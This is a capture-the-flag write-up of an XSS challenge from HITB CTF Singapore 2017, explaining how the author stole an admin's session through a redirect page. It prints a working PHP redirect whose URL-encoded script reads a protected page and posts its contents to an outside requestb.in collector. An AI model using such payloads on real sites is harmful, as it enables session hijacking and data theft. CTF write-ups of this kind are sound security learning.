[HITB CTF Singapore 2017] Web 434 – Website

Challenge:

No description
http://47.88.218.105:20010/

The login form!, we create an account and login to it, the challenge begin!

Obviously, we will click get flag, but it require us as admin. There is some clearly point for us to attack: “personal website”

So, we need to create a xss somewhere, and trick admin access to it.

After surfing, i see something good:

Change “getInfo” to some random random char, its printback, so how about a XSS payload?
Great!

So construct a redirect payload with cookie, send it to admin to steal his cookie solved the challenge? Nope!

The length is limit by 50 chars, we cant send it directly!

It’s SSRF TIMEEEEEE!

The idea is, create our php page which redirect whoever visit to the XSS page above!

i create index.php at /var/www/html/tsu/ like this

<?php header("Location: http://47.88.218.105:20010/action.php?callback=%3Cscript%20src%3D%22https%3A%2f%2fajax.googleapis.com%2fajax%2flibs%2fjquery%2f2.1.3%2fjquery.min.js%22%3E%3C%2fscript%3E%3Cscript%3E%20%24.get%28%27%2floged.php%27%2Cfunction%28data%29%7B%24.post%28%27https%3A%2f%2frequestb.in%2fr0uyoer0%3Finsp%3D%27%2C%7Bname%3Adata%7D%29%3B%7D%29%3B%20%3C%2fscript%3E&quot;);

Send my host to admin: https://meepwn.team/tsu/

wait some sec, and got it! the PHPSESSID of admin, but… we need “username” cookie to make us admin. Unfortunately, the http only flag is on so we cant steal it.

The only way to get flag is, trick admin click get flag himself and send flag back to us. It means we have to got csrf token, and do an request to make it real.

I’m not practice deep much with XSS, so this stage will bother me. Luckily, i got a very good xss in action teammate @quynhnhu
and he did it well, here the script:

https://pastebin.com/TqdGcYjP

we got flag!

Advertisements

2 thoughts on “[HITB CTF Singapore 2017] Web 434 – Website

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s